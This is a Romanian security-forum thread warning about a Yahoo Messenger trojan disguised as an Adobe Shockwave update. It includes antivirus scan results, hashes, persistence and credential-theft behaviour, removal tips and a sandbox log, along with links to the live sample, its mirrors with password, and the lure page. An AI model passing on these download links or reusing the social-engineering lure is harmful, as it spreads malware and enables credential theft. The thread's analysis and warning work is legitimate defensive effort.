Jump to content
begood

Inca un virus yahoo

Recommended Posts

2hrojk4.jpg

Se da drept un update de Adobe Shockwave player.

Cloud Antivirus l-a detectat imediat.

analiza virustotal :

http://www.virustotal.com/analisis/c085bc9738dca68a0242683ac0a825440af09f4a08fe74a441e0f8efefb313c5-1265013900

 File setup.exe received on 2010.02.01 08:45:00 (UTC)
Current status: finished
Result: 23/40 (57.50%)
Compact Compact
Print results Print results
Antivirus Version Last Update Result
a-squared 4.5.0.50 2010.02.01 Dialer!IK
AhnLab-V3 5.0.0.2 2010.01.31 Win-Trojan/Mdshell.3016192
AntiVir 7.9.1.154 2010.01.31 DIAL/Generic
Antiy-AVL 2.0.3.7 2010.02.01 -
Authentium 5.2.0.5 2010.01.31 W32/Trojan-Gypikon-based.DE!Maximus
Avast 4.8.1351.0 2010.01.31 Win32:Malware-gen
AVG 9.0.0.730 2010.01.31 -
BitDefender 7.2 2010.02.01 Win32.Worm.IM.J
CAT-QuickHeal 10.00 2010.02.01 -
ClamAV 0.96.0.0-git 2010.02.01 -
Comodo 3780 2010.02.01 Heur.Suspicious
DrWeb 5.0.1.12222 2010.02.01 -
eSafe 7.0.17.0 2010.01.31 Win32.DIALGeneric
eTrust-Vet 35.2.7274 2010.02.01 Win32/Tnega.ADE
F-Prot 4.5.1.85 2010.01.31 W32/Trojan-Gypikon-based.DE!Maximus
F-Secure 9.0.15370.0 2010.01.31 Win32.Worm.IM.J
Fortinet 4.0.14.0 2010.02.01 W32/Delf.TUP!tr
GData 19 2010.02.01 Win32.Worm.IM.J
Ikarus T3.1.1.80.0 2010.02.01 Dialer
Jiangmin 13.0.900 2010.01.28 -
K7AntiVirus 7.10.960 2010.01.29 -
Kaspersky 7.0.0.125 2010.02.01 Trojan.Win32.Agent2.cnkw
McAfee 5878 2010.01.31 Generic.dx!mgr
McAfee+Artemis 5878 2010.01.31 Artemis!FA8305E3E69B
McAfee-GW-Edition 6.8.5 2010.02.01 Dialer.Generic
Microsoft 1.5406 2010.02.01 -
NOD32 4823 2010.02.01 -
Norman 6.04.03 2010.01.31 -
nProtect 2009.1.8.0 2010.02.01 -
Panda 10.0.2.2 2010.01.31 Trj/CI.A
PCTools 7.0.3.5 2010.02.01 Trojan-PSW.Bancos
Rising 22.33.00.04 2010.02.01 -
Sophos 4.50.0 2010.02.01 Mal/Generic-A
Sunbelt 3.2.1858.2 2010.01.31 Trojan.Win32.Generic!BT
Symantec 20091.2.0.41 2010.02.01 Infostealer.Bancos
TheHacker 6.5.1.0.175 2010.02.01 -
TrendMicro 9.120.0.1004 2010.02.01 -
VBA32 3.12.12.1 2010.01.29 -
ViRobot 2010.2.1.2165 2010.02.01 -
VirusBuster 5.0.21.0 2010.01.31 -
Additional information
File size: 3016192 bytes
MD5 : fa8305e3e69b27a7b95dcf2cec0fcb9f
SHA1 : a4552f2899871702f83969ba01ce50228ab8c6fd
SHA256: c085bc9738dca68a0242683ac0a825440af09f4a08fe74a441e0f8efefb313c5

pagina de download originala :

http://dl.fisier.ro/files/dh5kgfingf335je/setup.exe.html

mirror :

http://www.2shared.com/file/11045927/5afa1303/setup_virus.html

pass :

begood@rstcenter.com

pagina de pe care o primesti prin yahoo IM:

http://roamateursxx.freehostking.com/profile.php?user=[ID-ul tau]

mirror la pagina asta :

http://www.2shared.com/file/11045982/d07f0f06/virus_downloadpage.html

aceeasi parola.

mesajul pe care l-am primit prin Y! im :

tu ti-ai facut profilu asta? http://roamateursxx.freehostking.com/profile.php?user=me

LE: Imi place cum au gandit atacatorii.

Trimit link cu un profil porno care nu este afisat corect la victima. Din cauza ca o afecteaza direct (id-ul victimei fiind in link), trebuie sa-si instaleze update-ul acela pentru a-si vedea propriu profil. Voila, nou trojan instalat.

Link to comment
Share on other sites

Thanks.

Virusul se copiaza in Windows/system32/cgsb.exe si se pune la startup in ( HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ). Iconita e de Internet Explorer.

Ca sa scapati de el stergeti acel fisier. Ciudat, ls startup, locatia de executare apare cu o virgula inainte.

La rulare arata un ProgressBar urat, si la sfarsit da eroare: "Unable to Register ActiveX...".

Cred ca foloseste OpenSSL, copiaza in system32 libeay32.dll si ssleay32.dll. Nu sunt sigur. Cred ca acel "setup" care probabil e un binder scris in Delphi, contine 5 fisiere. Mai copiaza si YahooAuth2.dll ( Bricksoft nu Yahoo! la Company Name, ciudat ). Si cred ca ar mai fi MSIMTF.DLL ( Microsoft ).

EDIT: La a doua rulare, s-a copiat sub numele de xdbyqdn.exe. Asta inseamna ca numele e aleator, sau poate avea un anumit numar de nume posibile.

CA SA SCAPATI DE EL: Intrati in Windows\system32 si stergeti executabilul/executabilele cu iconita de INTERNET EXPLORER ( 6 ).

Revin cu mai multe detalii.

Edited by Nytro
  • Upvote 1
Link to comment
Share on other sites

"citind de lup"

x (2/1/2010 2:30:58 PM): Georgiana: tu ti-ai facut profilu asta? hxxp://roamateursxx.freehostking.com/profile.php?user=id lui

x: ce ai zis ca ma pacalesti

x: si instalez ala nu ?

x: )

Hide Recent Messages (F3)

You currently appear offline to Georgiana.

x: si 2 vezi ca nu e frumos ce faci

x: dupa te miri dc te bate lumea )

x (2/1/2010 2:31:06 PM): mai are rost sa`i zic si ca are creieru mic ?

Flubber (2/1/2010 2:31:11 PM): http://rstcenter.com/forum/19709-inca-un-virus-yahoo.rst

Flubber (2/1/2010 2:31:13 PM): tocmai ce citeam

Link to comment
Share on other sites

Google Safe Browsing: Report a Malware Page

bagati mare aici.

asta : http://roamateursxx.freehostking.com/

LE: analiza anubis:

http://anubis.iseclab.org/?action=result&task_id=19351d648dd9e1984d109350b9a0ca423

Nytro, ai omis ca face si al patrulea fisier :

C:\WINDOWS\system32\YahooAuth2.dll

C:\WINDOWS\system32\libeay32.dll

C:\WINDOWS\system32\ssleay32.dll

C:\WINDOWS\system32\tqsbsf.exe

http://www.threatexpert.com/report.aspx?md5=fa8305e3e69b27a7b95dcf2cec0fcb9f

deci are si keylogger si stealer :)

grija mare pt cititori !

Link to comment
Share on other sites

Citeste:

HKCU\Software\Yahoo\pager\Yahoo! User ID

HKCU\Software\Yahoo\pager\ETS

HKCU\Software\Yahoo\pager\Save Password

Fura parola de messenger. Copiaza ID-ul si parola in:

HKLM\SOFTWARE\first\USER

HKLM\SOFTWARE\first\PAROLA

E prost scris, citeste Yahoo! User ID de ii sar capacele... Citeste la el pana e completat. Datele le citeste ca un keylogger, in functie de cum sunt apasate, probabil verifica fereastra activa.

Sa vad ce mai pot afla...

Edited by Nytro
Link to comment
Share on other sites

Probabil alta versiune.. se copiaza sub numele("efoqj.exe")

Am injurat o jumatate de zi la una acum 4 zile cand l-am primit :)) am crezut ca este trojan,

dupa aceea am vazut ca a mai trimis iar acelasi mesaj si mi-am dat seama ca nu are de a face...

link-ul primit... prima data a doua zi nu mai era bun,

001Webs.com Free Hosting | 404, Page Doesn't Exist!

link-ul catre fisierul executabil... inca este bun (nu am avut chef sa raportez pagina pe lx.ro daca vreti...)

http://profilexx.haos.ro/update.exe

Virus Total

Virustotal. MD5: 16c71403492c440996722d1d0af8f25a Infostealer.Bancos Dialer.Generic Worm.Agent.AJ

Anubius

Anubis: Analyzing Unknown Binaries

System Snapshots dupa rularea update.exe:


Dir Added C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\PresentationCore
Dir Added C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\PresentationCore\dbfa432eec6dd6c069fc11ce09a967e6
File Added C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\PresentationCore\dbfa432eec6dd6c069fc11ce09a967e6\PresentationCore.ni.dll
Dir Added C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAP2.tmp
File Added C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\index5f.dat
File Added C:\WINDOWS\system32\YahooAuth2.dll
File Added C:\WINDOWS\system32\efoqj.exe
File Added C:\WINDOWS\system32\libeay32.dll
File Added C:\WINDOWS\system32\ssleay32.dll
File Changed C:\Documents and Settings\LocalService\Cookies\index.dat "Modified=1/27/2010 4:04:52 PM" (old value="Modified=1/27/2010 4:03:04 PM")
File Changed C:\Documents and Settings\LocalService\Local Settings\History\History.IE5\index.dat "Modified=1/27/2010 4:04:52 PM" (old value="Modified=1/27/2010 4:03:04 PM")
File Changed C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat "Modified=1/27/2010 4:04:52 PM" (old value="Modified=1/27/2010 4:03:19 PM")
File Changed C:\Documents and Settings\LocalService\ntuser.dat.LOG "Modified=1/27/2010 4:05:05 PM" (old value="Modified=1/27/2010 4:04:14 PM")
File Changed C:\Documents and Settings\NetworkService\ntuser.dat.LOG "Modified=1/27/2010 4:05:06 PM" (old value="Modified=1/27/2010 4:04:16 PM")
File Changed C:\Program Files\Alwil Software\Avast4\Setup\setup.ini "Modified=1/27/2010 4:04:53 PM" (old value="Modified=1/27/2010 4:04:21 PM")
File Changed C:\Program Files\Alwil Software\Avast4\Setup\summary.txt "Size=157 Modified=1/27/2010 4:04:53 PM" (old value="Size=237 Modified=1/27/2010 3:49:39 PM")
File Changed C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ngen_service.log "Size=442046 Modified=1/27/2010 4:05:53 PM" (old value="Size=435936 Modified=1/27/2010 4:03:31 PM")
File Changed C:\WINDOWS\system32\config\default.LOG "Modified=1/27/2010 4:05:59 PM" (old value="Modified=1/27/2010 4:05:07 PM")
File Changed C:\WINDOWS\system32\config\system.LOG "Size=1024 Modified=1/27/2010 4:05:29 PM" (old value="Size=24576 Modified=1/27/2010 4:05:17 PM")
File Changed C:\WINDOWS\WindowsUpdate.log "Size=937698" (old value="Size=935860")
Dir Deleted C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAP1.tmp
File Deleted C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\index5d.dat
Reg Val Added HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Nqzvavfgengbe\Qrfxgbc\hcqngr.rkr BINARY SIZE=16 MD5=831F4D7C8AA6E01F622E4B4300A2E494
Reg Val Added HKCU\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer winspool,Ne00:
Reg Val Added HKCU\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer winspool,Ne00:,15,45
Reg Val Added HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Device Microsoft XPS Document Writer,winspool,Ne00:
Reg Val Added HKLM\SOFTWARE\ALWIL Software\Avast\4.0\UpdateReady 1
Reg Val Added HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\PresentationFramework, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\1\ImageList BINARY SIZE=3502 MD5=8088935202887196057F50A0851E9313
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\6\InvertDependencies\55d78379\49814236\4
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\2\InvertDependencies\55d78379\49814236\4
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e\DisplayName System.Deployment,2.0.0.0,,b03f5f7f11d50a3a
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e\InvertDependencies
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e\InvertDependencies\55d78379\49814236\4
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e\LastModTime BINARY SIZE=8 MD5=A5280890AF1017799761D91B8E6A6EBB
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e\SIG BINARY SIZE=36 MD5=94D1851D7E28900126DB8779282312C1
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e\Status 4098
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d\DisplayName Microsoft.VisualC,8.0.0.0,,b03f5f7f11d50a3a
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d\InvertDependencies
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d\InvertDependencies\55d78379\49814236\4
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d\LastModTime BINARY SIZE=8 MD5=F76C0889743D62F71A63DD879DD0ADB9
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d\SIG BINARY SIZE=36 MD5=189761152A9743F76DB0255A470C012F
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d\Status 4098
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\DisplayName UIAutomationTypes,3.0.0.0,,31bf3856ad364e35
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\55d78379\49814236\4
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\LastModTime BINARY SIZE=8 MD5=AE63CB6E17BE04A15BD69C7ABF9CE64C
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\SIG BINARY SIZE=36 MD5=034C2155150CE918AC8C879A620302EB
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\Status 4098
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\DisplayName UIAutomationProvider,3.0.0.0,,31bf3856ad364e35
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\55d78379\49814236\4
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\LastModTime BINARY SIZE=8 MD5=C0865EF9202DC6E0B357A24EC9D3384B
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\SIG BINARY SIZE=36 MD5=D39E4981EB46562754648F8CB00691DF
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\Status 4098
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\DisplayName System.Drawing,2.0.0.0,,b03f5f7f11d50a3a
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\55d78379\49814236\4
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\LastModTime BINARY SIZE=8 MD5=D2B3E6E21DF7D6BCAAA67646CF6276B9
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\SIG BINARY SIZE=36 MD5=0A86BF52F8B4C8838B5457994402CE08
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\Status 4098
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f\DisplayName PresentationCFFRasterizer,3.0.0.0,,31bf3856ad364e35
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f\InvertDependencies
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f\InvertDependencies\55d78379\49814236\4
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f\LastModTime BINARY SIZE=8 MD5=46DA9424A7E4313575998816161B9346
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f\SIG BINARY SIZE=36 MD5=0224578AFEFC3663122D3FA2BC397084
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f\Status 4098
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\8\InvertDependencies\55d78379\49814236\4
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\7\InvertDependencies\55d78379\49814236\4
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d67735\6a8e4b71\5\InvertDependencies
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d67735\6a8e4b71\5\InvertDependencies\55d78379\49814236\4
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\ConfigMask 4361
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\ConfigString ZAP--0000-0000
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\DisplayName PresentationCore,3.0.0.0,,31bf3856ad364e35
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\ILDependencies BINARY SIZE=160 MD5=096A31B6B5C8CFB799B56EC4700361F3
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\MVID BINARY SIZE=16 MD5=12B7A2D559DB2AE18514B850EBF54743
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\NIDependencies BINARY SIZE=60 MD5=3EB20EA66E26A96605A6B15592EC6093
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\Status 0
Reg Key Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f\ILUsageMask BINARY SIZE=2 MD5=B08B7C15585E653ED9D7F4A0A186496F
Reg Val Added HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f\NIUsageMask BINARY SIZE=1 MD5=31741635B41D535098241FEA03C1E47F
Reg Key Added HKLM\SOFTWARE\last
Reg Val Added HKLM\SOFTWARE\last\Parola
Reg Val Added HKLM\SOFTWARE\last\USER
Reg Key Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\DefaultSpoolDirectory C:\WINDOWS\System32\spool\PRINTERS
Reg Key Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Action 0
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Attributes 64
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\ChangeID 2664406
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Datatype RAW
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Default DevMode BINARY SIZE=1076 MD5=F5025FF677063E1E5B2AA5E432BF1C0D
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Default Priority 1
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Description
Reg Key Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\driverVersion 1025
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printBinNames Automatically Select
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printCollate BINARY SIZE=1 MD5=93B885ADFE0DA089CDF634904FD59F71
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printColor BINARY SIZE=1 MD5=55A54008AD1BA589AA210D2629C1DF41
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printDuplexSupported BINARY SIZE=1 MD5=93B885ADFE0DA089CDF634904FD59F71
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printLanguage
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMaxResolutionSupported 600
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMaxXExtent 8636
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMaxYExtent 11176
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMediaReady Letter
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMediaSupported Letter
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMinXExtent 900
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMinYExtent 900
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printNumberUp 0
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printOrientationsSupported PORTRAIT
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printRateUnit
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printStaplingSupported BINARY SIZE=1 MD5=93B885ADFE0DA089CDF634904FD59F71
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsKeyUpdate 0
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsKeyUpdateForeground 3
Reg Key Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\description
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\driverName Microsoft XPS Document Writer
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\flags 0
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\location
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\portName XPSPort:
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printEndTime 0
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printKeepPrintedJobs BINARY SIZE=1 MD5=93B885ADFE0DA089CDF634904FD59F71
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printSeparatorFile
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printShareName
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printSpooling PrintWhileSpooling
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printStartTime 0
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printerName Microsoft XPS Document Writer
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\priority 1
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\serverName tdx-f66aad8b5aa
